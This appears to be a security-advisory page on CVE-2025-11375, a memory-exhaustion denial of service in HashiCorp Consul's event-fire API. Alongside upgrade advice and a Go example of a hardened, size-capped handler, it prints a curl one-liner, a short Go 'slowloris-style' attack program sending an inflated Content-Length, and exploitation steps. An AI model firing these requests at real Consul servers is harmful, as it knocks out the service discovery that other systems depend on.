Consul, Denial of Service, CVE-2025-11375 (Moderate)


The CVE-2025-11375 vulnerability in HashiCorp Consul stems from the `/v1/event/fire` API endpoint’s failure to enforce a maximum value for the HTTP `Content-Length` request header. This omission allows an unauthenticated or authenticated attacker to craft and send a malicious HTTP POST request with an exceptionally large, artificially inflated `Content-Length` value. When Consul processes this request, it allocates server-side memory buffers based on this declared size in anticipation of receiving that volume of data. However, the attacker’s connection remains open, transmitting data extremely slowly or not at all, keeping these substantial memory allocations locked for an extended period. By sending multiple such requests concurrently, the attacker can exhaust the available memory on the Consul server node. This resource exhaustion leads to a denial-of-service condition, rendering the Consul service unresponsive and unable to handle legitimate requests from other services in the infrastructure, thereby disrupting service discovery and orchestration.
Platform: Consul
Version: <1.22.0
Vulnerability: DoS
Severity: Moderate
Date: 2025-10-28

Prediction: 2025-11-04

What Undercode Says:

curl -X POST -H "Content-Length: 999999999999" http://consul-server:8500/v1/event/fire -d '{"name":"dos"}'

// Example of a slowloris-style attack on the event endpoint
package main

import (
	"log"
	"net/http"
)

func main() {
	client := &http.Client{}
	req, err := http.NewRequest("POST", "http://localhost:8500/v1/event/fire", nil)
	if err != nil {
		log.Fatal(err)
	}
	req.ContentLength = 1 << 40 // Specify 1 TiB content length
	resp, err := client.Do(req)
	if err != nil {
		log.Fatal(err) // net/http reports any failure to send the request here
	}
	defer resp.Body.Close()
}

How to Exploit:

Craft malicious HTTP POST requests with an artificially large `Content-Length` header value and send them to the `/v1/event/fire` endpoint. Multiple concurrent requests exhaust server memory.

Protection from this CVE:

Upgrade Consul to versions 1.22.0, 1.21.6, 1.20.8, or 1.18.12. Implement network controls to restrict access to the Consul API.
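As an added illustration of the root cause described in the summary above and of the class of fix behind the upgrade advice here, the following Go program (written for this page, not Consul's own code) contrasts a handler that trusts the declared Content-Length and reads whatever arrives with one that rejects an oversized declared length before allocating anything and caps the bytes actually read with http.MaxBytesReader. The 1 MiB cap, the handler and helper names, and the constructed requests driven through net/http/httptest are assumptions for the example; Consul's own limit is not stated on the page.

```go
package main

import (
	"errors"
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"strings"
)

// maxEventBody is an assumed cap for an event payload (chosen for this example).
const maxEventBody int64 = 1 << 20 // 1 MiB

// ErrBodyTooLarge is returned when a request declares or sends more than the cap.
var ErrBodyTooLarge = errors.New("request body exceeds limit")

// readUnbounded models the weak pattern the advisory describes: the declared
// Content-Length is trusted and the body is read without any cap, so a client
// that declares a huge size can tie up server resources.
func readUnbounded(r *http.Request) ([]byte, error) {
	return io.ReadAll(r.Body)
}

// readBounded is the hardened form: an oversized declared Content-Length is
// rejected before any buffer is allocated, and http.MaxBytesReader caps the
// bytes actually read so a client that lies about (or omits) Content-Length
// cannot exceed the cap either.
func readBounded(w http.ResponseWriter, r *http.Request, limit int64) ([]byte, error) {
	if r.ContentLength > limit {
		return nil, ErrBodyTooLarge
	}
	r.Body = http.MaxBytesReader(w, r.Body, limit)
	body, err := io.ReadAll(r.Body)
	if err != nil {
		var mbe *http.MaxBytesError
		if errors.As(err, &mbe) {
			return nil, ErrBodyTooLarge
		}
		return nil, err
	}
	return body, nil
}

// fireEventHandler is a hypothetical handler for the event endpoint that applies
// readBounded and answers 413 when the cap is exceeded.
func fireEventHandler(limit int64) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		body, err := readBounded(w, r, limit)
		if errors.Is(err, ErrBodyTooLarge) {
			http.Error(w, "payload too large", http.StatusRequestEntityTooLarge)
			return
		}
		if err != nil {
			http.Error(w, "bad request", http.StatusBadRequest)
			return
		}
		fmt.Fprintf(w, "accepted %d bytes\n", len(body))
	}
}

// statusForDeclaredLength builds a constructed in-memory request that declares
// the given Content-Length (which may differ from the real payload size), runs
// it through the handler with no network involved, and returns the status code.
func statusForDeclaredLength(declared int64, payload string, limit int64) int {
	req := httptest.NewRequest(http.MethodPost, "/v1/event/fire", strings.NewReader(payload))
	req.ContentLength = declared
	rec := httptest.NewRecorder()
	fireEventHandler(limit)(rec, req)
	return rec.Code
}

func main() {
	payload := `{"name":"deploy"}`
	fmt.Println("honest length:", statusForDeclaredLength(int64(len(payload)), payload, maxEventBody))
	fmt.Println("declares 1 TiB:", statusForDeclaredLength(1<<40, payload, maxEventBody))
	fmt.Println("declares 64, sends 65:", statusForDeclaredLength(64, strings.Repeat("x", 65), 64))
}
```

The first check costs nothing and stops the advertised-size problem outright; the MaxBytesReader wrapper is what actually bounds memory, since Content-Length is client-supplied and chunked requests carry none at all. A reverse proxy in front of the API can enforce the same limit for a version that cannot be upgraded immediately.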

Impact:

Service unavailability, resource exhaustion, disruption of service discovery and mesh networking.


Sources:

Reported By: github.com
Extra Source Hub:
Undercode
